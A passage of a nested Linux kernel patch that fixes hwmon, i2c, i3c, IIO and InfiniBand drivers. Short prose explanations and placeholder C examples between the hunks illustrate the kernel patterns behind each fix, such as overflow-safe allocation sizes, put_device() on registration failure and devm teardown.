+ #define MAX_CORE_DATA		(NUM_REAL_CORES + BASE_SYSFS_ATTR_NO)
+diff --git a/drivers/hwmon/nct6775-core.c b/drivers/hwmon/nct6775-core.c
+index c54233f0369b2..80310845fb993 100644
+--- a/drivers/hwmon/nct6775-core.c
++++ b/drivers/hwmon/nct6775-core.c
+@@ -1528,17 +1528,21 @@ struct nct6775_data *nct6775_update_device(struct device *dev)
+ 							  data->fan_div[i]);
+ 
+ 			if (data->has_fan_min & BIT(i)) {
+-				err = nct6775_read_value(data, data->REG_FAN_MIN[i], &reg);
++				u16 tmp;
++
++				err = nct6775_read_value(data, data->REG_FAN_MIN[i], &tmp);
+ 				if (err)
+ 					goto out;
+-				data->fan_min[i] = reg;
++				data->fan_min[i] = tmp;
+ 			}
+ 
+ 			if (data->REG_FAN_PULSES[i]) {
+-				err = nct6775_read_value(data, data->REG_FAN_PULSES[i], &reg);
++				u16 tmp;
++
++				err = nct6775_read_value(data, data->REG_FAN_PULSES[i], &tmp);
+ 				if (err)
+ 					goto out;
+-				data->fan_pulses[i] = (reg >> data->FAN_PULSE_SHIFT[i]) & 0x03;
++				data->fan_pulses[i] = (tmp >> data->FAN_PULSE_SHIFT[i]) & 0x03;
+ 			}
+ 
+ 			err = nct6775_select_fan_div(dev, data, i, reg);
+diff --git a/drivers/hwmon/sch5627.c b/drivers/hwmon/sch5627.c
+index 25fbbd4c9a2b3..886386272b9f4 100644
+--- a/drivers/hwmon/sch5627.c
++++ b/drivers/hwmon/sch5627.c
+@@ -6,6 +6,7 @@
+ 
+ #define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
+ 
++#include <linux/bits.h>
+ #include <linux/module.h>
+ #include <linux/mod_devicetable.h>
+ #include <linux/init.h>
+@@ -32,6 +33,10 @@
+ #define SCH5627_REG_PRIMARY_ID		0x3f
+ #define SCH5627_REG_CTRL		0x40
+ 
++#define SCH5627_CTRL_START		BIT(0)
++#define SCH5627_CTRL_LOCK		BIT(1)
++#define SCH5627_CTRL_VBAT		BIT(4)
++
+ #define SCH5627_NO_TEMPS		8
+ #define SCH5627_NO_FANS			4
+ #define SCH5627_NO_IN			5
+@@ -147,7 +152,8 @@ static int sch5627_update_in(struct sch5627_data *data)
+ 
+ 	/* Trigger a Vbat voltage measurement every 5 minutes */
+ 	if (time_after(jiffies, data->last_battery + 300 * HZ)) {
+-		sch56xx_write_virtual_reg(data->addr, SCH5627_REG_CTRL, data->control | 0x10);
++		sch56xx_write_virtual_reg(data->addr, SCH5627_REG_CTRL,
++					  data->control | SCH5627_CTRL_VBAT);
+ 		data->last_battery = jiffies;
+ 	}
+ 
+@@ -226,6 +232,14 @@ static int reg_to_rpm(u16 reg)
+ static umode_t sch5627_is_visible(const void *drvdata, enum hwmon_sensor_types type, u32 attr,
+ 				  int channel)
+ {
++	const struct sch5627_data *data = drvdata;
++
++	/* Once the lock bit is set, the virtual registers become read-only
++	 * until the next power cycle.
++	 */
++	if (data->control & SCH5627_CTRL_LOCK)
++		return 0444;
++
+ 	if (type == hwmon_pwm && attr == hwmon_pwm_auto_channels_temp)
+ 		return 0644;
+ 
+@@ -483,14 +497,13 @@ static int sch5627_probe(struct platform_device *pdev)
+ 		return val;
+ 
+ 	data->control = val;
+-	if (!(data->control & 0x01)) {
++	if (!(data->control & SCH5627_CTRL_START)) {
+ 		pr_err("hardware monitoring not enabled\n");
+ 		return -ENODEV;
+ 	}
+ 	/* Trigger a Vbat voltage measurement, so that we get a valid reading
+ 	   the first time we read Vbat */
+-	sch56xx_write_virtual_reg(data->addr, SCH5627_REG_CTRL,
+-				  data->control | 0x10);
++	sch56xx_write_virtual_reg(data->addr, SCH5627_REG_CTRL, data->control | SCH5627_CTRL_VBAT);
+ 	data->last_battery = jiffies;
+ 
+ 	/*
+diff --git a/drivers/hwmon/sch56xx-common.c b/drivers/hwmon/sch56xx-common.c
+index de3a0886c2f72..ac1f725807155 100644
+--- a/drivers/hwmon/sch56xx-common.c
++++ b/drivers/hwmon/sch56xx-common.c
+@@ -7,10 +7,8 @@
+ #define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
+ 
+ #include <linux/module.h>
+-#include <linux/mod_devicetable.h>
+ #include <linux/init.h>
+ #include <linux/platform_device.h>
+-#include <linux/dmi.h>
+ #include <linux/err.h>
+ #include <linux/io.h>
+ #include <linux/acpi.h>
+@@ -21,10 +19,7 @@
+ #include <linux/slab.h>
+ #include "sch56xx-common.h"
+ 
+-static bool ignore_dmi;
+-module_param(ignore_dmi, bool, 0);
+-MODULE_PARM_DESC(ignore_dmi, "Omit DMI check for supported devices (default=0)");
+-
++/* Insmod parameters */
+ static bool nowayout = WATCHDOG_NOWAYOUT;
+ module_param(nowayout, bool, 0);
+ MODULE_PARM_DESC(nowayout, "Watchdog cannot be stopped once started (default="
+@@ -523,66 +518,11 @@ static int __init sch56xx_device_add(int address, const char *name)
+ 	return PTR_ERR_OR_ZERO(sch56xx_pdev);
+ }
+ 
+-static const struct dmi_system_id sch56xx_dmi_override_table[] __initconst = {
+-	{
+-		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "CELSIUS W380"),
+-		},
+-	},
+-	{
+-		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "ESPRIMO P710"),
+-		},
+-	},
+-	{
+-		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "ESPRIMO E9900"),
+-		},
+-	},
+-	{ }
+-};
+-
+-/* For autoloading only */
+-static const struct dmi_system_id sch56xx_dmi_table[] __initconst = {
+-	{
+-		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"),
+-		},
+-	},
+-	{ }
+-};
+-MODULE_DEVICE_TABLE(dmi, sch56xx_dmi_table);
+-
+ static int __init sch56xx_init(void)
+ {
+-	const char *name = NULL;
+ 	int address;
++	const char *name = NULL;
+ 
+-	if (!ignore_dmi) {
+-		if (!dmi_check_system(sch56xx_dmi_table))
+-			return -ENODEV;
+-
+-		if (!dmi_check_system(sch56xx_dmi_override_table)) {
+-			/*
+-			 * Some machines like the Esprimo P720 and Esprimo C700 have
+-			 * onboard devices named " Antiope"/" Theseus" instead of
+-			 * "Antiope"/"Theseus", so we need to check for both.
+-			 */
+-			if (!dmi_find_device(DMI_DEV_TYPE_OTHER, "Antiope", NULL) &&
+-			    !dmi_find_device(DMI_DEV_TYPE_OTHER, " Antiope", NULL) &&
+-			    !dmi_find_device(DMI_DEV_TYPE_OTHER, "Theseus", NULL) &&
+-			    !dmi_find_device(DMI_DEV_TYPE_OTHER, " Theseus", NULL))
+-				return -ENODEV;
+-		}
+-	}
+-
+-	/*
+-	 * Some devices like the Esprimo C700 have both onboard devices,
+-	 * so we still have to check manually
+-	 */
+ 	address = sch56xx_find(0x4e, &name);
+ 	if (address < 0)
+ 		address = sch56xx_find(0x2e, &name);
+diff --git a/drivers/i2c/busses/i2c-bcm-iproc.c b/drivers/i2c/busses/i2c-bcm-iproc.c
+index 30a2a3200bed9..86a080f24d8a2 100644
+--- a/drivers/i2c/busses/i2c-bcm-iproc.c
++++ b/drivers/i2c/busses/i2c-bcm-iproc.c
+@@ -316,26 +316,44 @@ static void bcm_iproc_i2c_slave_init(
+ 	iproc_i2c_wr_reg(iproc_i2c, IE_OFFSET, val);
+ }
+ 
+-static void bcm_iproc_i2c_check_slave_status(
+-	struct bcm_iproc_i2c_dev *iproc_i2c)
++static bool bcm_iproc_i2c_check_slave_status(struct bcm_iproc_i2c_dev *iproc_i2c,
++					     u32 status)
+ {
+ 	u32 val;
++	bool recover = false;
+ 
+-	val = iproc_i2c_rd_reg(iproc_i2c, S_CMD_OFFSET);
+-	/* status is valid only when START_BUSY is cleared after it was set */
+-	if (val & BIT(S_CMD_START_BUSY_SHIFT))
+-		return;
++	/* check slave transmit status only if slave is transmitting */
++	if (!iproc_i2c->slave_rx_only) {
++		val = iproc_i2c_rd_reg(iproc_i2c, S_CMD_OFFSET);
++		/* status is valid only when START_BUSY is cleared */
++		if (!(val & BIT(S_CMD_START_BUSY_SHIFT))) {
++			val = (val >> S_CMD_STATUS_SHIFT) & S_CMD_STATUS_MASK;
++			if (val == S_CMD_STATUS_TIMEOUT ||
++			    val == S_CMD_STATUS_MASTER_ABORT) {
++				dev_warn(iproc_i2c->device,
++					 (val == S_CMD_STATUS_TIMEOUT) ?
++					 "slave random stretch time timeout\n" :
++					 "Master aborted read transaction\n");
++				recover = true;
++			}
++		}
++	}
++
++	/* RX_EVENT is not valid when START_BUSY is set */
++	if ((status & BIT(IS_S_RX_EVENT_SHIFT)) &&
++	    (status & BIT(IS_S_START_BUSY_SHIFT))) {
++		dev_warn(iproc_i2c->device, "Slave aborted read transaction\n");
++		recover = true;
++	}
+ 
+-	val = (val >> S_CMD_STATUS_SHIFT) & S_CMD_STATUS_MASK;
+-	if (val == S_CMD_STATUS_TIMEOUT || val == S_CMD_STATUS_MASTER_ABORT) {
+-		dev_err(iproc_i2c->device, (val == S_CMD_STATUS_TIMEOUT) ?
+-			"slave random stretch time timeout\n" :
+-			"Master aborted read transaction\n");
++	if (recover) {
+ 		/* re-initialize i2c for recovery */
+ 		bcm_iproc_i2c_enable_disable(iproc_i2c, false);
+ 		bcm_iproc_i2c_slave_init(iproc_i2c, true);
+ 		bcm_iproc_i2c_enable_disable(iproc_i2c, true);
+ 	}
++
++	return recover;
+ }
+ 
+ static void bcm_iproc_i2c_slave_read(struct bcm_iproc_i2c_dev *iproc_i2c)
+@@ -420,48 +438,6 @@ static bool bcm_iproc_i2c_slave_isr(struct bcm_iproc_i2c_dev *iproc_i2c,
+ 	u32 val;
+ 	u8 value;
+ 
+-	/*
+-	 * Slave events in case of master-write, master-write-read and,
+-	 * master-read
+-	 *
+-	 * Master-write     : only IS_S_RX_EVENT_SHIFT event
+-	 * Master-write-read: both IS_S_RX_EVENT_SHIFT and IS_S_RD_EVENT_SHIFT
+-	 *                    events
+-	 * Master-read      : both IS_S_RX_EVENT_SHIFT and IS_S_RD_EVENT_SHIFT
+-	 *                    events or only IS_S_RD_EVENT_SHIFT
+-	 *
+-	 * iproc has a slave rx fifo size of 64 bytes. Rx fifo full interrupt
+-	 * (IS_S_RX_FIFO_FULL_SHIFT) will be generated when RX fifo becomes
+-	 * full. This can happen if Master issues write requests of more than
+-	 * 64 bytes.
+-	 */
+-	if (status & BIT(IS_S_RX_EVENT_SHIFT) ||
+-	    status & BIT(IS_S_RD_EVENT_SHIFT) ||
+-	    status & BIT(IS_S_RX_FIFO_FULL_SHIFT)) {
+-		/* disable slave interrupts */
+-		val = iproc_i2c_rd_reg(iproc_i2c, IE_OFFSET);
+-		val &= ~iproc_i2c->slave_int_mask;
+-		iproc_i2c_wr_reg(iproc_i2c, IE_OFFSET, val);
+-
+-		if (status & BIT(IS_S_RD_EVENT_SHIFT))
+-			/* Master-write-read request */
+-			iproc_i2c->slave_rx_only = false;
+-		else
+-			/* Master-write request only */
+-			iproc_i2c->slave_rx_only = true;
+-
+-		/* schedule tasklet to read data later */
+-		tasklet_schedule(&iproc_i2c->slave_rx_tasklet);
+-
+-		/*
+-		 * clear only IS_S_RX_EVENT_SHIFT and
+-		 * IS_S_RX_FIFO_FULL_SHIFT interrupt.
+-		 */
+-		val = BIT(IS_S_RX_EVENT_SHIFT);
+-		if (status & BIT(IS_S_RX_FIFO_FULL_SHIFT))
+-			val |= BIT(IS_S_RX_FIFO_FULL_SHIFT);
+-		iproc_i2c_wr_reg(iproc_i2c, IS_OFFSET, val);
+-	}
+ 
+ 	if (status & BIT(IS_S_TX_UNDERRUN_SHIFT)) {
+ 		iproc_i2c->tx_underrun++;
+@@ -493,8 +469,9 @@ static bool bcm_iproc_i2c_slave_isr(struct bcm_iproc_i2c_dev *iproc_i2c,
+ 		 * less than PKT_LENGTH bytes were output on the SMBUS
+ 		 */
+ 		iproc_i2c->slave_int_mask &= ~BIT(IE_S_TX_UNDERRUN_SHIFT);
+-		iproc_i2c_wr_reg(iproc_i2c, IE_OFFSET,
+-				 iproc_i2c->slave_int_mask);
++		val = iproc_i2c_rd_reg(iproc_i2c, IE_OFFSET);
++		val &= ~BIT(IE_S_TX_UNDERRUN_SHIFT);
++		iproc_i2c_wr_reg(iproc_i2c, IE_OFFSET, val);
+ 
+ 		/* End of SMBUS for Master Read */
+ 		val = BIT(S_TX_WR_STATUS_SHIFT);
+@@ -515,9 +492,49 @@ static bool bcm_iproc_i2c_slave_isr(struct bcm_iproc_i2c_dev *iproc_i2c,
+ 				 BIT(IS_S_START_BUSY_SHIFT));
+ 	}
+ 
+-	/* check slave transmit status only if slave is transmitting */
+-	if (!iproc_i2c->slave_rx_only)
+-		bcm_iproc_i2c_check_slave_status(iproc_i2c);
++	/* if the controller has been reset, immediately return from the ISR */
++	if (bcm_iproc_i2c_check_slave_status(iproc_i2c, status))
++		return true;
++
++	/*
++	 * Slave events in case of master-write, master-write-read and,
++	 * master-read
++	 *
++	 * Master-write     : only IS_S_RX_EVENT_SHIFT event
++	 * Master-write-read: both IS_S_RX_EVENT_SHIFT and IS_S_RD_EVENT_SHIFT
++	 *                    events
++	 * Master-read      : both IS_S_RX_EVENT_SHIFT and IS_S_RD_EVENT_SHIFT
++	 *                    events or only IS_S_RD_EVENT_SHIFT
++	 *
++	 * iproc has a slave rx fifo size of 64 bytes. Rx fifo full interrupt
++	 * (IS_S_RX_FIFO_FULL_SHIFT) will be generated when RX fifo becomes
++	 * full. This can happen if Master issues write requests of more than
++	 * 64 bytes.
++	 */
++	if (status & BIT(IS_S_RX_EVENT_SHIFT) ||
++	    status & BIT(IS_S_RD_EVENT_SHIFT) ||
++	    status & BIT(IS_S_RX_FIFO_FULL_SHIFT)) {
++		/* disable slave interrupts */
++		val = iproc_i2c_rd_reg(iproc_i2c, IE_OFFSET);
++		val &= ~iproc_i2c->slave_int_mask;
++		iproc_i2c_wr_reg(iproc_i2c, IE_OFFSET, val);
++
++		if (status & BIT(IS_S_RD_EVENT_SHIFT))
++			/* Master-write-read request */
++			iproc_i2c->slave_rx_only = false;
++		else
++			/* Master-write request only */
++			iproc_i2c->slave_rx_only = true;
++
++		/* schedule tasklet to read data later */
++		tasklet_schedule(&iproc_i2c->slave_rx_tasklet);
++
++		/* clear IS_S_RX_FIFO_FULL_SHIFT interrupt */
++		if (status & BIT(IS_S_RX_FIFO_FULL_SHIFT)) {
++			val = BIT(IS_S_RX_FIFO_FULL_SHIFT);
++			iproc_i2c_wr_reg(iproc_i2c, IS_OFFSET, val);
++		}
++	}
+ 
+ 	return true;
+ }
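
After the reorder, the iproc slave ISR runs the recovery check first and returns as soon as the controller has been re-initialized, because status bits captured before the reset no longer describe live hardware; only then does it handle RX/RD events. The shape in the abstract (all my_* names are placeholders):

/* Generic shape of the reordered ISR above (placeholder names). */
#include <linux/interrupt.h>

static irqreturn_t my_isr(int irq, void *data)
{
	struct my_ctrl *ctrl = data;
	u32 status = my_read_status(ctrl);

	/*
	 * If recovery re-initialized the controller, the captured
	 * status is stale: stop handling it right here.
	 */
	if (my_check_and_recover(ctrl, status))
		return IRQ_HANDLED;

	if (status & MY_RX_EVENT)
		my_handle_rx(ctrl);

	return IRQ_HANDLED;
}
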
+diff --git a/drivers/i3c/master.c b/drivers/i3c/master.c
+index 351c81a929a6c..ab0b5691b03e0 100644
+--- a/drivers/i3c/master.c
++++ b/drivers/i3c/master.c
+@@ -1508,9 +1508,11 @@ i3c_master_register_new_i3c_devs(struct i3c_master_controller *master)
+ 			desc->dev->dev.of_node = desc->boardinfo->of_node;
+ 
+ 		ret = device_register(&desc->dev->dev);
+-		if (ret)
++		if (ret) {
+ 			dev_err(&master->dev,
+ 				"Failed to add I3C device (err = %d)\n", ret);
++			put_device(&desc->dev->dev);
++		}
+ 	}
+ }
+ 
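
The i3c fix applies the driver-core rule that device_register() consumes the caller's reference even when it fails: the error path must call put_device(), never kfree(), so that cleanup runs through the ->release() callback. The canonical shape:

/* Canonical device_register() error handling, as in the fix above. */
#include <linux/device.h>

static int register_child(struct device *child, struct device *parent)
{
	int ret;

	ret = device_register(child);
	if (ret) {
		dev_err(parent, "failed to add device (err = %d)\n", ret);
		/*
		 * Never kfree() here: drop the reference and let the
		 * ->release() callback free the structure.
		 */
		put_device(child);
	}
	return ret;
}
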
+diff --git a/drivers/iio/frequency/adf4350.c b/drivers/iio/frequency/adf4350.c
+index 85e289700c3c5..4abf80f75ef5d 100644
+--- a/drivers/iio/frequency/adf4350.c
++++ b/drivers/iio/frequency/adf4350.c
+@@ -33,7 +33,6 @@ enum {
+ 
+ struct adf4350_state {
+ 	struct spi_device		*spi;
+-	struct regulator		*reg;
+ 	struct gpio_desc		*lock_detect_gpiod;
+ 	struct adf4350_platform_data	*pdata;
+ 	struct clk			*clk;
+@@ -469,6 +468,15 @@ static struct adf4350_platform_data *adf4350_parse_dt(struct device *dev)
+ 	return pdata;
+ }
+ 
++static void adf4350_power_down(void *data)
++{
++	struct iio_dev *indio_dev = data;
++	struct adf4350_state *st = iio_priv(indio_dev);
++
++	st->regs[ADF4350_REG2] |= ADF4350_REG2_POWER_DOWN_EN;
++	adf4350_sync_config(st);
++}
++
+ static int adf4350_probe(struct spi_device *spi)
+ {
+ 	struct adf4350_platform_data *pdata;
+@@ -491,31 +499,21 @@ static int adf4350_probe(struct spi_device *spi)
+ 	}
+ 
+ 	if (!pdata->clkin) {
+-		clk = devm_clk_get(&spi->dev, "clkin");
++		clk = devm_clk_get_enabled(&spi->dev, "clkin");
+ 		if (IS_ERR(clk))
+-			return -EPROBE_DEFER;
+-
+-		ret = clk_prepare_enable(clk);
+-		if (ret < 0)
+-			return ret;
++			return PTR_ERR(clk);
+ 	}
+ 
+ 	indio_dev = devm_iio_device_alloc(&spi->dev, sizeof(*st));
+-	if (indio_dev == NULL) {
+-		ret =  -ENOMEM;
+-		goto error_disable_clk;
+-	}
++	if (indio_dev == NULL)
++		return -ENOMEM;
+ 
+ 	st = iio_priv(indio_dev);
+ 
+-	st->reg = devm_regulator_get(&spi->dev, "vcc");
+-	if (!IS_ERR(st->reg)) {
+-		ret = regulator_enable(st->reg);
+-		if (ret)
+-			goto error_disable_clk;
+-	}
++	ret = devm_regulator_get_enable(&spi->dev, "vcc");
++	if (ret)
++		return ret;
+ 
+-	spi_set_drvdata(spi, indio_dev);
+ 	st->spi = spi;
+ 	st->pdata = pdata;
+ 
+@@ -544,47 +542,21 @@ static int adf4350_probe(struct spi_device *spi)
+ 
+ 	st->lock_detect_gpiod = devm_gpiod_get_optional(&spi->dev, NULL,
+ 							GPIOD_IN);
+-	if (IS_ERR(st->lock_detect_gpiod)) {
+-		ret = PTR_ERR(st->lock_detect_gpiod);
+-		goto error_disable_reg;
+-	}
++	if (IS_ERR(st->lock_detect_gpiod))
++		return PTR_ERR(st->lock_detect_gpiod);
+ 
+ 	if (pdata->power_up_frequency) {
+ 		ret = adf4350_set_freq(st, pdata->power_up_frequency);
+ 		if (ret)
+-			goto error_disable_reg;
++			return ret;
+ 	}
+ 
+-	ret = iio_device_register(indio_dev);
++	ret = devm_add_action_or_reset(&spi->dev, adf4350_power_down, indio_dev);
+ 	if (ret)
+-		goto error_disable_reg;
+-
+-	return 0;
+-
+-error_disable_reg:
+-	if (!IS_ERR(st->reg))
+-		regulator_disable(st->reg);
+-error_disable_clk:
+-	clk_disable_unprepare(clk);
+-
+-	return ret;
+-}
+-
+-static void adf4350_remove(struct spi_device *spi)
+-{
+-	struct iio_dev *indio_dev = spi_get_drvdata(spi);
+-	struct adf4350_state *st = iio_priv(indio_dev);
+-	struct regulator *reg = st->reg;
+-
+-	st->regs[ADF4350_REG2] |= ADF4350_REG2_POWER_DOWN_EN;
+-	adf4350_sync_config(st);
+-
+-	iio_device_unregister(indio_dev);
+-
+-	clk_disable_unprepare(st->clk);
++		return dev_err_probe(&spi->dev, ret,
++				     "Failed to add action to managed power down\n");
+ 
+-	if (!IS_ERR(reg))
+-		regulator_disable(reg);
++	return devm_iio_device_register(&spi->dev, indio_dev);
+ }
+ 
+ static const struct of_device_id adf4350_of_match[] = {
+@@ -607,7 +579,6 @@ static struct spi_driver adf4350_driver = {
+ 		.of_match_table = adf4350_of_match,
+ 	},
+ 	.probe		= adf4350_probe,
+-	.remove		= adf4350_remove,
+ 	.id_table	= adf4350_id,
+ };
+ module_spi_driver(adf4350_driver);
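
The adf4350 conversion deletes remove() outright: devm_clk_get_enabled() and devm_regulator_get_enable() tie the clock and supply to the device lifetime, and the one ordered teardown step left, programming the power-down bit, becomes a devm action registered just before devm_iio_device_register(), so it executes right after the IIO device is unregistered. The action pattern in isolation (my_* names are placeholders):

/* The devm-action teardown pattern used above (placeholder names). */
#include <linux/device.h>

static void my_power_down(void *data)
{
	struct my_state *st = data;

	my_write_power_down_bit(st);	/* quiesce the hardware */
}

static int my_probe_tail(struct device *dev, struct my_state *st)
{
	int ret;

	/*
	 * Actions run in reverse order of registration on detach, and
	 * also on any later probe failure ("or_reset").
	 */
	ret = devm_add_action_or_reset(dev, my_power_down, st);
	if (ret)
		return ret;

	return my_register_interface(dev, st);
}
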
+diff --git a/drivers/infiniband/core/device.c b/drivers/infiniband/core/device.c
+index 3c422698a51c1..3a9b9a28d858f 100644
+--- a/drivers/infiniband/core/device.c
++++ b/drivers/infiniband/core/device.c
+@@ -804,7 +804,7 @@ static int alloc_port_data(struct ib_device *device)
+ 	 * empty slots at the beginning.
+ 	 */
+ 	pdata_rcu = kzalloc(struct_size(pdata_rcu, pdata,
+-					rdma_end_port(device) + 1),
++					size_add(rdma_end_port(device), 1)),
+ 			    GFP_KERNEL);
+ 	if (!pdata_rcu)
+ 		return -ENOMEM;
+diff --git a/drivers/infiniband/core/sa_query.c b/drivers/infiniband/core/sa_query.c
+index 0de83d9a4985d..8c69bdb5bb754 100644
+--- a/drivers/infiniband/core/sa_query.c
++++ b/drivers/infiniband/core/sa_query.c
+@@ -2220,7 +2220,9 @@ static int ib_sa_add_one(struct ib_device *device)
+ 	s = rdma_start_port(device);
+ 	e = rdma_end_port(device);
+ 
+-	sa_dev = kzalloc(struct_size(sa_dev, port, e - s + 1), GFP_KERNEL);
++	sa_dev = kzalloc(struct_size(sa_dev, port,
++				     size_add(size_sub(e, s), 1)),
++			 GFP_KERNEL);
+ 	if (!sa_dev)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/infiniband/core/sysfs.c b/drivers/infiniband/core/sysfs.c
+index ee59d73915689..ec5efdc166601 100644
+--- a/drivers/infiniband/core/sysfs.c
++++ b/drivers/infiniband/core/sysfs.c
+@@ -903,7 +903,7 @@ alloc_hw_stats_device(struct ib_device *ibdev)
+ 	 * Two extra attribute elements here, one for the lifespan entry and
+ 	 * one to NULL terminate the list for the sysfs core code
+ 	 */
+-	data = kzalloc(struct_size(data, attrs, stats->num_counters + 1),
++	data = kzalloc(struct_size(data, attrs, size_add(stats->num_counters, 1)),
+ 		       GFP_KERNEL);
+ 	if (!data)
+ 		goto err_free_stats;
+@@ -1009,7 +1009,7 @@ alloc_hw_stats_port(struct ib_port *port, struct attribute_group *group)
+ 	 * Two extra attribute elements here, one for the lifespan entry and
+ 	 * one to NULL terminate the list for the sysfs core code
+ 	 */
+-	data = kzalloc(struct_size(data, attrs, stats->num_counters + 1),
++	data = kzalloc(struct_size(data, attrs, size_add(stats->num_counters, 1)),
+ 		       GFP_KERNEL);
+ 	if (!data)
+ 		goto err_free_stats;
+@@ -1140,7 +1140,7 @@ static int setup_gid_attrs(struct ib_port *port,
+ 	int ret;
+ 
+ 	gid_attr_group = kzalloc(struct_size(gid_attr_group, attrs_list,
+-					     attr->gid_tbl_len * 2),
++					     size_mul(attr->gid_tbl_len, 2)),
+ 				 GFP_KERNEL);
+ 	if (!gid_attr_group)
+ 		return -ENOMEM;
+@@ -1205,8 +1205,8 @@ static struct ib_port *setup_port(struct ib_core_device *coredev, int port_num,
+ 	int ret;
+ 
+ 	p = kvzalloc(struct_size(p, attrs_list,
+-				attr->gid_tbl_len + attr->pkey_tbl_len),
+-		    GFP_KERNEL);
++				size_add(attr->gid_tbl_len, attr->pkey_tbl_len)),
++		     GFP_KERNEL);
+ 	if (!p)
+ 		return ERR_PTR(-ENOMEM);
+ 	p->ibdev = device;
+diff --git a/drivers/infiniband/core/user_mad.c b/drivers/infiniband/core/user_mad.c
+index 98cb594cd9a69..d96c78e436f98 100644
+--- a/drivers/infiniband/core/user_mad.c
++++ b/drivers/infiniband/core/user_mad.c
+@@ -1373,7 +1373,9 @@ static int ib_umad_add_one(struct ib_device *device)
+ 	s = rdma_start_port(device);
+ 	e = rdma_end_port(device);
+ 
+-	umad_dev = kzalloc(struct_size(umad_dev, ports, e - s + 1), GFP_KERNEL);
++	umad_dev = kzalloc(struct_size(umad_dev, ports,
++				       size_add(size_sub(e, s), 1)),
++			   GFP_KERNEL);
+ 	if (!umad_dev)
+ 		return -ENOMEM;
+ 
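The four infiniband core hunks above share one theme: allocation sizes derived from port and counter numbers now go through the saturating size_add()/size_sub()/size_mul() helpers from <linux/overflow.h> instead of raw e - s + 1 arithmetic, so an overflow saturates at SIZE_MAX (which kzalloc() rejects) rather than wrapping into an undersized buffer. A stand-alone illustration, where sat_add() is a hand-rolled stand-in for the kernel helper:

#include <stdint.h>
#include <stdio.h>

/* simplified stand-in for the kernel's size_add() */
static size_t sat_add(size_t a, size_t b)
{
        return (b > SIZE_MAX - a) ? SIZE_MAX : a + b;
}

int main(void)
{
        size_t huge = SIZE_MAX - 1;

        printf("wrapping:   %zu\n", huge + 2);          /* wraps to 0 */
        printf("saturating: %zu\n", sat_add(huge, 2));  /* stays SIZE_MAX */
        return 0;
}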
+diff --git a/drivers/infiniband/hw/hfi1/efivar.c b/drivers/infiniband/hw/hfi1/efivar.c
+index 7741a1d69097c..2b5d264f41e51 100644
+--- a/drivers/infiniband/hw/hfi1/efivar.c
++++ b/drivers/infiniband/hw/hfi1/efivar.c
+@@ -112,7 +112,7 @@ int read_hfi1_efi_var(struct hfi1_devdata *dd, const char *kind,
+ 		      unsigned long *size, void **return_data)
+ {
+ 	char prefix_name[64];
+-	char name[64];
++	char name[128];
+ 	int result;
+ 
+ 	/* create a common prefix */
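The hfi1 change above simply doubles name[] to 128 bytes: the full variable name is composed from the 64-byte prefix_name plus the kind string, so a 64-byte destination could be silently truncated by snprintf(). A small demonstration of that failure mode (buffer sizes only, the hfi1 strings themselves are not reproduced):

#include <stdio.h>
#include <string.h>

int main(void)
{
        char prefix[64], small[64], big[128];

        memset(prefix, 'a', sizeof(prefix) - 1);
        prefix[sizeof(prefix) - 1] = '\0';

        /* a 63-char prefix plus "-kind" cannot fit in 64 bytes... */
        snprintf(small, sizeof(small), "%s-%s", prefix, "kind");
        /* ...but fits easily in 128 */
        snprintf(big, sizeof(big), "%s-%s", prefix, "kind");

        printf("small: %zu chars (truncated)\n", strlen(small));
        printf("big:   %zu chars (complete)\n", strlen(big));
        return 0;
}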
+diff --git a/drivers/infiniband/hw/hns/hns_roce_ah.c b/drivers/infiniband/hw/hns/hns_roce_ah.c
+index 480c062dd04f1..103a7787b3712 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_ah.c
++++ b/drivers/infiniband/hw/hns/hns_roce_ah.c
+@@ -33,7 +33,9 @@
+ #include <linux/pci.h>
+ #include <rdma/ib_addr.h>
+ #include <rdma/ib_cache.h>
++#include "hnae3.h"
+ #include "hns_roce_device.h"
++#include "hns_roce_hw_v2.h"
+ 
+ static inline u16 get_ah_udp_sport(const struct rdma_ah_attr *ah_attr)
+ {
+@@ -58,6 +60,7 @@ int hns_roce_create_ah(struct ib_ah *ibah, struct rdma_ah_init_attr *init_attr,
+ 	struct hns_roce_dev *hr_dev = to_hr_dev(ibah->device);
+ 	struct hns_roce_ah *ah = to_hr_ah(ibah);
+ 	int ret = 0;
++	u32 max_sl;
+ 
+ 	if (hr_dev->pci_dev->revision == PCI_REVISION_ID_HIP08 && udata)
+ 		return -EOPNOTSUPP;
+@@ -71,9 +74,17 @@ int hns_roce_create_ah(struct ib_ah *ibah, struct rdma_ah_init_attr *init_attr,
+ 	ah->av.hop_limit = grh->hop_limit;
+ 	ah->av.flowlabel = grh->flow_label;
+ 	ah->av.udp_sport = get_ah_udp_sport(ah_attr);
+-	ah->av.sl = rdma_ah_get_sl(ah_attr);
+ 	ah->av.tclass = get_tclass(grh);
+ 
++	ah->av.sl = rdma_ah_get_sl(ah_attr);
++	max_sl = min_t(u32, MAX_SERVICE_LEVEL, hr_dev->caps.sl_num - 1);
++	if (unlikely(ah->av.sl > max_sl)) {
++		ibdev_err_ratelimited(&hr_dev->ib_dev,
++				      "failed to set sl, sl (%u) shouldn't be larger than %u.\n",
++				      ah->av.sl, max_sl);
++		return -EINVAL;
++	}
++
+ 	memcpy(ah->av.dgid, grh->dgid.raw, HNS_ROCE_GID_SIZE);
+ 	memcpy(ah->av.mac, ah_attr->roce.dmac, ETH_ALEN);
+ 
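The create_ah hunk above validates the caller-supplied service level against what the hardware reports before programming it into the address vector; hns_roce_v2_set_path() below gains the same check. The logic reduced to plain C, where the cap value 7 is an assumption standing in for MAX_SERVICE_LEVEL:

#include <stdio.h>

#define MAX_SERVICE_LEVEL 7     /* assumed value, for illustration only */

/* reject an SL above min(MAX_SERVICE_LEVEL, sl_num - 1) */
static int check_sl(unsigned int sl, unsigned int hw_sl_num)
{
        unsigned int max_sl = hw_sl_num - 1;

        if (max_sl > MAX_SERVICE_LEVEL)
                max_sl = MAX_SERVICE_LEVEL;

        return (sl > max_sl) ? -1 : 0;
}

int main(void)
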